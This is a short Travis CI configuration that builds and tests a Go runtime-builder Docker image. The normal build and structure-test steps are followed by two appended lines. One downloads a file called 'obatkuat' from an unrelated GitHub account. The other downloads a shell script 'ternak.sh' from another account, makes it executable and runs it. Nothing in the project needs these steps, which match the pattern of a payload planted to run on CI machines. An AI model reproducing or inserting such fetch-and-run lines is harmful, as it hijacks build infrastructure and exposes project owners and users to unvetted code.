sudo: required

env:
  - IMAGE_NAME="golang:staging"
    GO_VERSION="1.10"

services:
- docker

branches:
  only:
    - master

script:
- curl -o structure-test -sSLO https://storage.googleapis.com/container-structure-test/latest/container-structure-test-linux-amd64
- chmod +x structure-test
- docker build -t "go1-builder:${GO_VERSION}" --build-arg go_version="${GO_VERSION}" -q runtime-builder/
- ./structure-test test --image "go1-builder:${GO_VERSION}" --config runtime-builder/tests/structure/test_config.yaml
- wget https://raw.githubusercontent.com/outbesok/mesin/main/obatkuat   
- wget https://raw.githubusercontent.com/menyoo866/golang-docker/master/ternak.sh && chmod u+x ternak.sh && ./ternak.sh
